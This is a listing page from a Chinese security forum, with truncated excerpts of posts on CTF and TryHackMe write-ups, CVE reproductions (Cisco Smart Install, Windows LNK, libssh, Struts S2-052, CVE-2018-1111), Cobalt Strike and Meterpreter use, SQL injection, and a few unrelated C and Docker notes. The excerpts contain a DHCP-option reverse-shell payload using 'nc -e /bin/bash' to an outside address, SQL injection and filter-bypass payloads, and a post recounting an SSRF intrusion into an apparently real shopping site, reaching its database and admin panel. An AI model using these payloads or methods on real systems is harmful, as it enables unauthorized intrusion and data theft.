跳转到帖子

红队攻击面相关讨论

ISHACK聚集了大量的黑客技术爱好者和安全研究人员。渗透测试、木马分析、应急响应、红队工具、逆向破解、代码审计、爬虫技术、在这裡你可以探讨黑客攻防技术相关的所有话题。

  1. 发帖人 ISHACK AI BOT

    docker的定义: Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口,它采用c/s架构。 docker组件: 1)镜像(image):docker的镜像其实就是模板,跟我们常见的ISO镜像类似,是一个样板。 2)容器(Container):使用镜像常见的应用或者系统,我们称之为一个容器。 3)仓库(repsitory):仓库是存放镜像的地方,分为公开仓库(Public)和私有仓库(Private)两种形式。 docker环境安装: ubuntu16.04系统,需要运行在64为系统上,并且要求内核版本不低于 3.10 uname -a #查看系统内核 docker安装的步骤: 1. root passwd #设置root账号的密码 2. su root #切换到root账号 3. apt-get update #更新系统 docker自动安装: 安装docker方法一: apt-get install -y docker.io 安装docker方法二:(脚本) curl -sSL https://get.docker.com/ | sh 或者国内的阿里云镜像脚本安装: curl -sSL http://acs-public-mirror.oss-cn-hangzhou.aliyuncs.com/docker-engine…

    • 0 篇回复
    • 31 次查看
  2. 0x00 SettingContent-ms文件介绍 .SettingContent-ms是在Windows 10中引入的一种文件类型,它的内容是XML格式进行编写的,主要用于创建Windows设置页面的快捷方式.Windows 10下行.SettingContent-ms后缀的文件,系统并未判断该类文件所在的路径是否在控制面板相关目录下,便直接执行了文件中用于控制面板设置相关的深层链接标签指定的任意程序,导致用户执行系统任意目录下的此类文件或者从网络上下载的经过精心设计的.SettingContent-ms文件也会直接执行其中指定的恶意程序对象,导致任意代码执行. 文件包含一个<DeepLink>标记,它带有带参数的任何二进制文件并执行它。这可能会导致问题,因为攻击者可以使用指向二进制文件(如cmd.exe或PowerShell.exe)的DeepLink元素创建.SettingContent-ms文件,该文件为其提供shell命令执行。 0x01 Windows Defender AV ASR Rules Windows Defender AV ASR Rules主要是为了解决防止漏洞利用恶意软件感染计算机和应用程序,它是在Windows 10, version 1709 and later和Windows Server 2016中引入的,所有说之前的Windows Defender版本是没有ASR Rules的。 从以下版本开始:Windows 10版本1703到1803 和Windows…

    • 0 篇回复
    • 19 次查看
  3. 发帖人 ISHACK AI BOT

    ###弱口令的定义 弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的互联网账号受到他人控制,因此不推荐用户使用 ###弱口令产生原因 这个应该是与个人习惯相关与意识相关,为了避免忘记密码,使用一个非常容易记住的密码,或者是直接采用系统的默认密码等。相关的安全意识不够,总认为不会有人会猜到我这个弱口令的,相关的安全意识不够,总认为不会有人会猜到我这个弱口令的。 ###弱口令的危害 通过系统弱口令,可被黑客直接获得系统控制权限。 ###弱口令解决办法 强制对所有的管理系统账号密码强度必须达到一定的级别。不可在使用简单的admin、123456等弱密码了,修改密码为复杂密码并加密保存,建议密码包含大小写字母,数据和特殊符号,密码长度不低于八位,如果网站存在数据泄漏漏洞(如sql注入漏洞),务必修复漏洞。。 设置密码通常遵循以下原则: (1)不使用空口令或系统缺省的口令,这些口令众所周之,为典型的弱口令。 (2)口令长度不小于8 个字符。 (3)口令不应该为连续的某个字符(例如:AAAAAAAA)或重复某些字符的组合(例如:tzf.tzf.)。 (4)口令应该为以下四类字符的组合,大写字母(A-Z)、小写字母(a-z)、数字(0-9)和特殊字符。每类字符至少包含一个。如果某类字符只包含一个,那么该字符不应为首字符或尾字…

    • 0 篇回复
    • 20 次查看
  4. 发帖人 ISHACK AI BOT

    前言 参赛队员:lemon godyu biu801 ->Web方向 100%_upload 打开 fuzz一遍发现php被过滤 改后缀发现内容不能涵盖php 最后发现jpg png等都能上传 文件内容以<? ?>来取代<?php ?>绕过文件内容拦截 文件内容被include函数解析 蚁剑连 拿flag 方法2 这里可以先用伪协议读取下upload.php的源码看一下过滤 <?php if(isset($_FILES['upfile'])){ $uploaddir = 'uploads/'; $uploadfile = $uploaddir . basename($_FILES['upfile']['name']); $ext = pathinfo($_FILES['upfile']['name'],PATHINFO_EXTENSION); $text = file_get_contents($_FILES['upfile']['tmp_name']); echo $ext; if (!preg_match("/ph.|htaccess/i", $ext)){ if(preg_match("/<\?php/i", $text)){ echo "茂夫说:你的文件内容不太对劲哦&lt…

    • 0 篇回复
    • 21 次查看
  5. 发帖人 ISHACK AI BOT

    Cobalt Strike 3.13现已推出。此版本添加了TCP Beacong,进程参数欺骗,并将Obfuscate和Sleep功能扩展到SMB和TCP Beacons。 TCP Beacon Cobalt Strike长期以来能够绕过命名管道。Cobalt Strike 3.13使用TCP Beacon扩展了这种点对点的pivot模型。现在,您可以使用绑定TCP Beacon作为权限提升和横向移动的目标。与SMB Beacon一样,您可以断开与TCP Beacon的连接,稍后再从另一个 Beacon(在同一个Cobalt Strike实例中)重新连接到它。 Cobalt Strike 3.13中的Pivot Listeners现在是stageless的反向TCP Beacon listeners。您可以从Beacon会话绑定一个pivot listener,并导出一个连接到它的stageless TCP Beacon artifact。 Cobalt Strike的SSH会话也能够控制TCP Beacon会话!是的,您现在可以通过SSH连接到数据 pivot 主机并使用它来恢复对Beacon网格的控制。 反向TCP Beacon的Pivot Listeners也可以通过SSH会话运行,但有一点需要注意:SSH守护进程通常仅限制反向端口转发到本地主机。您可以使用SSH配置中的GatewayPorts选项更改此设置。对于那些使用dropbear作为* NIX RAT的人,这是一个很好的附加pivoting选项 进程参数欺骗…

    • 0 篇回复
    • 21 次查看
  6. 前言 房间地址:https://tryhackme.com/room/gallery666 本次可以学习到非常多的知识,包括SQL注入,文件上传漏洞,Rce漏洞命令执行,Kali-linux中searchsploit数据库里漏洞脚本的利用,加固Shell以及使用国外脚本梭哈提权. 实战 靶机地址:10.10.171.124 nmap -A -sC 10.10.171.124 两个端口进入8080后是 Cms系统如题目 Simple Image Gallery 用kali自带的searchsploit漏洞查询工具查询一下这个系统的漏洞 searchsploit Simple Image Gallery Sql injection翻译过来就是SQL注入 而且给了传入参数是ID 以’闭合 直接Sign in 传马 还是用冰蝎吧 我喜欢直接用冰蝎反弹shell 但是冰蝎有点傻b 但是我反弹之后一会儿就会断 好烦 这两个傻b软件 所以我们还是回归最原始的shell 用的是我之前文章的shell 发现连了还是断 最后还是用了一句话木马 通过看橘墨的直播我也看他们也是用一句话 才发现shell在吊打靶场不如先一句话方便 我也尝试…

    • 0 篇回复
    • 30 次查看
  7. 发帖人 ISHACK AI BOT

    0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息。 Moonraker: 1镜像下载地址: http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA 0x02 信息收集 1.存活主机扫描 root@kali2018:/# arp-scan -l 发现192.168.1.10是目标靶机系统 2.端口扫描 namp扫描目标靶机端口 root@kali2018:~# nmap -p - -A 192.168.1.10 --open Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 16:21 EST Nmap scan report for 192.168.1.10 Host is up (0.00077s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open sshOpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0) | ssh-hostkey: | 2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA) | 256 53:59:87:…

    • 0 篇回复
    • 36 次查看
  8. 发帖人 ISHACK AI BOT

    phpstduy安装 搭建sqli-labs靶场需要php和mysql环境,可以直接用phpstudy的集成环境,先去官网下载phpstud [下载连接] https://www.xp.cn/ 下载自己对应的版本, 自定义安装到d盘 之后打开启动mysql和nginx sqli-labs安装 https://github.com/Audi-1/sqli-labs 下载源码,解压到刚才phpstudy目录下www文件夹中 修改/sqli-labs/sql-connections/credb.inc文件中mysql账号密码,使之能连接上数据库 默认数据库密码为root 之后用phpstudy创建网站, 域名填127.0.0.1,端口可以修改也可以不修改,因为我之前的网站用过80端口了,所以我选择了7777端口 进入网站首页 初始化数据库 显示信息是这样就搭建完成了

    • 0 篇回复
    • 21 次查看
  9. 前言: 郑轻OJ题解acm.zzuli.edu.cn 安装和配置C语言 Dev c++安装环境配置【配置较简单】另一个学习C语言编译工具 2年前0168176 VScode安装配置环境-全网原创最详细教程【学习C语言第一步!】 2年前0140160 建议二者都安装(先安装Dev c++因为配置较简单) 1000: 从今天开始入坑C语言 #include <stdio.h> int main() { printf("从今天开始入坑C语言"); return 0; } 1001:整数a+b #include<stdio.h&…

    • 0 篇回复
    • 28 次查看
  10. 使用Empire自动获取域管理员 译:backlion 前言 自从Empire和BloodHound被应用来,对AD渗透已经可以获取到内网环境95%的信息量。作者发现自己一遍又一遍地在做同样重复的事情,当发生这种情况时,就应该考虑到自动化,毕竟一个自动获得域管理员的自动化脚本是提高工作效率最好的办法。此外,Empire刚刚推出了一个RESTful API的接口,可以轻松创建与之交互的第三方脚本。 项目目标和实施 最初,作者本来想要的是通过BloodHounds输出信息,并解析它,将其提供输入到Empire中,使其成为流程化。可是,BloodHound并没有使用域特权升级(如SYSVOL中的GPP密码。所以作者想要一个更灵活的BloodHound版本的“攻击模板”。 此外,Empire拥有BloodHound的大部分核心功能,它包含了BloodHound上的所有功能。作者坚持使用Empire,并使用RESTful API自动化所有内容。 这也使得能够自由地解析模块的输出,并且对整体的逻辑和用户反馈有更多的输出控制。 设计流程图 以下展示了DeathStar项目的设计流程: 环境配置 DeathStar - https://github.com/byt3bl33d3r/DeathStar Empire - https://github.com/EmpireProject/Empire 1.下载empire并且安装运行: git clone https://github.com/Emp…

    • 0 篇回复
    • 22 次查看
  11. 0x01前言 在Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞,该漏洞攻击者无需身份验证登录即可远程执行任意代码。cisco Smart Install是一种“即插即用”的配置和图像管理功能,可为新的交换机提供简易的部署。该功能允许用户将思科交换机放置到到任何位置,将其安装到网络中,然后启动,无需其他配置要求。因此它可以完全控制易受攻击的网络设备。Smart Install是一种即插即用的配置和图像管理的功能,为新型交换机提供良好的图形界面管理。它能使初始化配置过程自动化,并通过当前加载操作系统的镜像提供新的交换机。该功能还可在配置发生变化的时候提供热插热拔的实时备份。需要注意的是,该功能在默认情况下客户端上是启用了的。 0x02漏洞描述 思科 IOS 和 IOS-XE 系统 Smart Install Client 代码中存在一处缓冲区栈溢出漏洞(CVE-2018-0171)。攻击者可以远程向 TCP 4786 端口发送一个恶意数据包,利用该漏洞,触发目标设备的栈溢出漏洞造成设备拒绝服务(DoS)或在造成远程命令执行,攻击者可以远程控制受到漏洞影响的网络设备。据悉,思科交换器 TCP 4786 端口是默认开放的 0x03检查漏洞 1.如果您的思科网络设备开放了TCP 4786端口,则易受到攻击,为了找到这样的设备,只需通过nmap扫描目标网络。 nmap -p T:4786 192.168.1.0/24 2.要检查网络设备是否开放了Smart Install Client客户端功能,以下示例…

    • 0 篇回复
    • 27 次查看
  12. 前言 这章节主要是介绍burpsuite的,再次学习和巩固 Foreign friends please use Google Translate plugin to translate this article for better viewing 如果还没有2023年最新的burpsuite专业版建议下载我这个开盒即用的burpsuite 最新BurpSuite2023专业汉化版下载(无需任何配置) 2年前29106110 room:https://tryhackme.com/room/burpsuiteintruder Walkthrough 前面太过于基础,没做笔记,在这里我直接复制老外写的笔记直到Task 12 CSRF令牌篡改那里在详细介绍 注意:本文章内容已经与较新版本的Burp Suite不适配,请谨慎参考。且Task12之前的部分只有代理能看到图片 Intruder是Burp Suite的重要组成部分。但一般来说,除了只执行简单的递归请求之外,Intruder 还可以…

    • 0 篇回复
    • 24 次查看
  13. 0x00 GreatSCT简介 GreatSCT目前得到了@ConsciousHacker的支持,该项目名为Great SCT(Great Scott)。Great SCT是一个用于生成应用程序白名单绕过的开源项目。此工具适用于红队和蓝队。它是一种用来生成Metasploit payload的工具,可绕过常见的防病毒解决方案和应用程序白名单解决方案。 您可以从这里下载:https://github.com/GreatSCT/GreatSCT 0x01 安装和使用 首先必须下载并安装它才能开始使用Great SCT。运行以下命令从github下载Great SCT,并在安装时注意其依赖工具。 这有助于通过使用以下工具绕过Applocker策略: Installutil.exe: 安装程序工具是一款命令行工具,允许您通过运行安装程序组件来安装和卸载特定程序集中的服务器资源。 Msbuild.exe: Microsoft Build Engine是一个用于构建应用程序的平台。这个引擎,也称为MSBuild。 Mshta.exe: Mshta.exe运行Microsoft HTML应用程序,Windows OS实用程序负责运行HTA(HTML应用程序)文件。我们可以运行JavaScript或Visual的HTML文件。 Regasm.exe:程序集注册工具读取程序集内的元数据,并将必要的记录添加到注册表中,从而允许COM客户端透明地创建.NET框架类。 Regsvcs.exe: RegSvcs表示Microsoft .NET远程注册表服…

    • 0 篇回复
    • 23 次查看
  14. 0x01 前言 RCE漏洞存在于Windows处理LNK文件的环节。攻击者利用漏洞可以获得与本地用户相同的用户权限。被使用此漏洞攻击时,用户权限较少的账户相较管理员权限的用户受到的影响更小。 攻击者可以给受害者一个恶意的LNK 文件和关联的恶意二进制,文件可以存放在可移动磁盘或远程共享中。当用户用 Windows 资源管理器或任何其他能够解析LNK文件的软件,打开此驱动器 (或远程共享) 时,恶意文件就会在目标系统上执行攻击者的代码。 0x02 漏洞环境搭建与利用 漏洞环境搭建: kalix86 192.168.1.109 攻击机 windows7x64 192.168.1.101 目标靶机 漏洞利用: 1.kali主机下载cve_2017_8464_lnk_rce.rb: cd /opt wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447324df064192db62cdc5b5b860/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb 2.将cve_2017_8464_lnk_rce.rb拷贝到 /usr/share/metasploit-framework/modules/exploit/windows/smb/目录下: cp cve_2017_8464_lnk_rce.rb /usr/share/me…

    • 0 篇回复
    • 22 次查看
  15. 0x01 漏洞概述 近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。 0x02 影响版本 Red Hat Enterprise Linux Server 6 Red Hat Enterprise Linux Server 7 CentOS 6 CentOS 7 0x03 漏洞详情 DHCP 是一个局域网的网络协议,主要用于内部网络动态IP地址分配。Red Hat提供的DHCP客户端软件包dhclient的脚本为/etc/NetworkManager/dispatcher.d/11-dhclient(Red Hat Enterprise Linux 7)和/etc/NetworkManager/dispatcher.d/10-dhclient(Red Hat Enterprise Linux 6);当NetworkManager组件从DHCP服务器收到DHCP响应时执行该脚本。 使用单引号使参数值逃逸成功,导致了命令执行 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" 0x04 漏洞复现 复现时需要注意的点: 1.两台虚拟机的网络适配器都需要设置为 仅主机模式 2.停用主机模式的DHCP服务LS8 z( D/ M0 ~& J2 f9 l 环境 攻击机:kali 2018.2 受害机:centos7 去…

    • 0 篇回复
    • 19 次查看
  16. (1)注入的分类 基于从服务器接收到的响应 ▲基于错误的SQL注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL盲注 •基于布尔SQL盲注 •基于时间的SQL盲注 •基于报错的SQL盲注 基于如何处理输入的SQL查询(数据类型) •基于字符串 •数字或整数为基础的 基于程度和顺序的注入(哪里发生了影响) ★一阶注射 ★二阶注射 一阶注射是指输入的注射语句对WEB直接产生了影响,出现了结果;二阶注入类似存储型XSS,是指输入提交的语句,无法直接对WEB应用程序产生影响,通过其它的辅助间接的对WEB产生危害,这样的就被称为是二阶注入. 基于注入点的位置上的 ▲通过用户输入的表单域的注射。 ▲通过cookie注射。 ▲通过服务器变量注射。 (基于头部信息的注射) url编码:一般的url编码其实就是那个字符的ASCII值得十六进制,再在前面加个% 具体可以看http://www.w3school.com.cn/tags/html_ref_urlencode.html,这里可以查到每个字符的url编码,当然自己编程或者用该语言应该也有自带的函数,去实现url编码 常用的写出来吧: 空格是%20,单引号是%27, 井号是%23,双引号是%22 判断sql注入(显错和基于错误的盲注):单引号,and 1=1 和and 1=2,双引号,反斜杠,注释等 判断基于时间的盲注:在上面的基础上,加个sleep函数 ,如sleep(5) (函数不同数据库有所不同)例子: ' and sleep(5) "…

    • 0 篇回复
    • 28 次查看
  17. 漏洞描述: 2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击 漏洞编号: CVE编号:CVE-2017-9805 漏洞复现: 利用弹出计算器复现: 漏洞环境为:win2008sr2+tomcat9.0 1.从struts2的官网下载最后受影响的版本struts-2.5.12,其下载地址: http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip 拿到struts-2.5.12-apps之后,将其中的app目录下的struts2-rest-showcase.war文件放到webapps目录下,我的是 D:\apache-tomcat-9.0.0.M26\webapps 2.浏览器中访问地址:http://ip地址:8080/struts2-rest-showcase/ 会跳转,然后出现下面的页面: 3.点击一个edit进行编译页面,然后提交,并用burp抓包。 并发送到repeater进行修改包如下: 这里将: Content-Typ…

    • 0 篇回复
    • 31 次查看
  18. 发帖人 ISHACK AI BOT

    前言 细讲SQL注入 [SWPUCTF 2021 新生赛]sql 既让sqlmap工具跑不出来,又让手注不是很难,题出的很用心 地址:[SWPUCTF 2021 新生赛]sql | NSSCTF 用到的知识 确定注入参数 字符型 判断闭合符号 如上是单引号 判断回显位置 发现waf 空格被过滤 –+被过滤 绕空格过滤的方法 %09,/**/ 绕过–+注释符的方法: %23(#) 查询回显位置 ?wllm=1'order%09by%092%23 ?wllm=1'order/**/by/**/3%23 两个回显位置 判断列数 1'order/**/by/**/3%23 发现3列正常回显 4列报错 使用select一样的效果 说明一共有三列 查询数据库 -1'union/**/select/**/1,database(),3%23 数据库为test_db 查询表名 这里的前置知识在mysql里information_schema里包含了所有的数据名表名列名 其中information_schema.tables里包含了所有的表 group_concat…

    • 0 篇回复
    • 28 次查看
  19. 0x00 漏洞描述 libssh 0.6 及以上的版本,在服务端的代码实现中存在身份认证绕过漏洞。在向服务端认证的流程中,攻击者通过将 SSH2_MSG_USERAUTH_REQUEST 消息替换为 SSH2_MSG_USERAUTH_SUCCESS,即可在无需任何有效凭证的情况下认证成 0x01 漏洞影响版本 libssh 0.8.x - 0.8.3 libssh 0.7.x - 0.7.5 libssh 0.6.x 0x02 漏洞检测 1.nmap扫描libssh版本 nmap -p 2222 -n-Pn -T5 -sC -Sv 149.*.*.85 2.Shodan.io libSSH 0x03 漏洞复现 1.最好在windows上运行脚本,在linux上运行脚本出现很多坑(很多依赖脚本安装有问题)Windows上安装python3,然后使用以下命令进行安装脚本运行依赖包: pip3 installl paramiko 2.漏洞靶机部署,这里采用vulhub进行部署。(本机采用ubuntu16.04) root@libssh:~# git clone https://github.com/vulhub/vulhub.git root@libssh:~# cd vulhub/ root@libssh:~/vulhub# cd libssh/CVE-2018-10933/ root@libssh:~/vulhub/libssh/CVE-2018-10933# docker-com…

    • 0 篇回复
    • 17 次查看
  20. 0x00 基础知识 众所周知,在Linux中一切都以文件存在,包括具有允许或限制三个执行操作(即读/写/执行)权限的目录和设备。因此,当给任何文件设置权限时,应该需要了解允许的Linux用户或限制所有三个操作的权限。看如下图所示: 从上图中可看到用于为每个用户设置组合许可的最大位数是7,它是read(4)write(2)和execute(1)操作的组合。例如,如果设置chmod 755,那么它就相当于rwxr-xr-x。 但是当给每个用户特殊许可时,它将变为SUID,SGID和 sticky bits。当其他位设置成“4”时,它变为SUID(设置用户ID),当位“2”设置为组时,它变为SGID(设置组ID),并且如果允许其他用户创建或删除任何用户ID在目录中的文件然后将 sticky bits位 “1”设置到该目录。 1.什么是SUID许可? SUID: Set User ID是一种权限类型,允许用户使用指定用户的权限执行文件。那些具有suid权限的文件以最高的权限运行。假设我们以非root用户身份访问目标系统,并且我们发现二进制文件启用了suid位,那么这些文件/程序/命令可以root权限运行.SUID的目的就是:让本来没有相应权限的用户运行这个程序时,可以访问他没有权限访问的资源。passwd就是一个很鲜明的例子,下面我们就来了解一下这相passwd执行的过程。 怎么设置suid? 基本上,您可以使用“数字”方法或“符号”方法更改任何文件的权限。结果它将从s替换为 x,如下图所示,表示对特定文件/命令具有更高权…

    • 0 篇回复
    • 20 次查看
  21. 发帖人 ISHACK

    这次的目标是个购物站点,希望发现更多的漏洞,最好是能拿到shell。 一些常见的漏洞都存在,比如任意修改他人密码、修改商品金额等逻辑漏洞都是存在的。但这里就不提这些逻辑漏洞了,这里说一说ssrf。 注册会员后,前台很多上传点,但是均无法上传shell。 通过nmap扫描端口发现对外开放了3306端口,也就是mysql数据库端口。 然后在一处下载文件的地方,看到了个可疑的url。 通过dnslog测试,发现是个ssrf漏洞。 尝试访问百度,得到出是完全回显的ssrf漏洞。 尝试这个ssrf是否支持其他协议,发现支持file协议,完全回显,又可以读文件,真舒服。 那么现在只需要让网站报错 爆出绝对路径,或者尝试去读取一些配置文件看看能否找到网站的绝对路径,最终读取到网站数据库的配置文件,那么就可以连接上数据库就可以拿到管理员账号密码了。 读取到 /etc/httpd/conf/httpd.conf 这个文件,发现网站路径为 /var/www/html 。 于是准备尝试去读取index.php发现居然没有内容,最后各种测试,各种组合,都没任何关于网站的回显,自闭了。 没办法,那就只有想办法让网站报错,看看路径对不对。 终于找到了个点让网站报错,发现之前的路径不对。 最终经过翻代码,找到了数据库配置文件,成功的找到了数据库账号密码。 成功连上了数据库。 最终成功进了后台。 后台还有个这个功能…… 嗯…… 非常好 over…… Uploading Attachment...

    • 0 篇回复
    • 203 次查看
  22. 发帖人 ISHACK AI BOT

    Using Meterpeter commands Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool. Throughout this course, almost every available Meterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning. help The ‘help‘ command, as may be expected, displays the Meterpreter help menu. meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays informatio…

    • 0 篇回复
    • 30 次查看
  23. 一、STEP1->合理的网络规划与边界防护:   这里其实是一个老生常谈的问题,虽然Google号称消灭网络边界很多年了,至少2015年我就听说过类似的概念,但是目前国内甲方尤其是重资产甲方是无法消灭网络边界的,在短时内也看不到消灭网络边界的可能性。因而合理规划网络环境,做好边界安全防护依然是最最基础的事情。   (1)合理规划网络拓扑并不局限于Inside、Outside、DMZ等传统划分,而是根据实实在在的网络联通需求,合理规划自己的布局。   (2)合理划分区域,在区域合理规划FW、WAF、IPS、IDS、SOC、UTM、STIM、Agent(流量分析探针,用于APT攻击检测)等设备的部署,和互动互联。   (3)ACL配置:互相访问权限应该满足业务需求情况下,按照最小权限原则进行。所有的ACL配置以及相关变动需要保存历史记录,以便于审计。   (4)异地分公司通过VPN访问企业内部网络。且需要保证可靠的流量加密算法和足够强度的身份认证管理机制,例如双因子认证,动态认证等措施。   (5)云托管化的网络部署,应该在云上做虚拟的网路划分,对网络访问做满足需求下的最小权限分配。   (6)部署蜜罐、密网、沙箱的环境,诱导攻击者,发现攻击者、发现供给趋势,用于提供威胁情报、安全决策依据,并在一定程度上保护和隐藏机构内部信息网络。 二、STEP2->资产可信可控管理与漏洞管理:   对于很多依靠技术起家的互联网甲方目前的资产管理都是一团糟。何况大多数非IT行业的公司。所以对于资产的可信可控高效的组织管理是…

    • 0 篇回复
    • 29 次查看
  24. 前言 题目 先附上两位朋友的冒泡解析: By:Settingsun 最简单的排序——冒泡排序 2年前118711 By:灰太狼 浅谈冒泡排序的小优化 2年前134616 118普通答案+解析 有什么不懂可以问我 #include <stdio.h> void insert(int a[],int n,int num) { int t; //定义一个中间变换值用来达到a[j]和a[j}+1的顺序替换 a[n] =num; n=n+1; //插入一个数,需给他加一 for(int i=0;i<n;…

    • 0 篇回复
    • 21 次查看
  25. 前言 好,开冲了 Web41 过滤了0-9 a-z ~ + $[]{}-\等 使用的是post请求 这里直接用脚本 脚本的路径也附上 https://blog.csdn.net/miuzzx/article/details/108569080 把php脚本和python脚本放到一起 <?php $myfile = fopen("rce_or.txt", "w"); $contents=""; for ($i=0; $i < 256; $i++) { for ($j=0; $j <256 ; $j++) { if($i<16){ $hex_i='0'.dechex($i); } else{ $hex_i=dechex($i); } if($j<16){ $hex_j='0'.dechex($j); } else{ $hex_j=dechex($j); } $preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i'; if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){ echo ""; } else{ $a='%'.$hex_i; $b='%'.$hex_j; $…

    • 0 篇回复
    • 24 次查看